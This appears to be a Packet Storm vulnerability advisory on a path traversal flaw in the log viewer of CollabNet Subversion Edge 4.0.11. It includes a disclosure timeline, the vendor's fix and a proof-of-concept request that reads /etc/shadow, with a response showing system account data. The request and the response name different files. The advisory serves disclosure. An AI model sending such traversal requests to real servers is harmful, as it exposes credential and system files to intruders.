The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "filename" parameter of the show action. Fixed in version 5.0. Version 4.0.11 is affected.
a81a00d4e11ec10f5cba3ea70751d59751a88dc2fb69e74a400c31265fe07b31# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via "fileName" parameter of the show action
#
# Date: 10.10.2014
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the show action
Vulnerability:
Request:
GET /csvn/log/show?fileName=../../../../../../etc/shadow HTTP/1.1
Host: example.com:4434
Response:
HTTP/1.1 200 OK
[...]
<div class="span3">../../../../../../etc/passwd</div>
[...]
root:x:0:0:root:/root:/bin/bash
Fix proposal:
Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed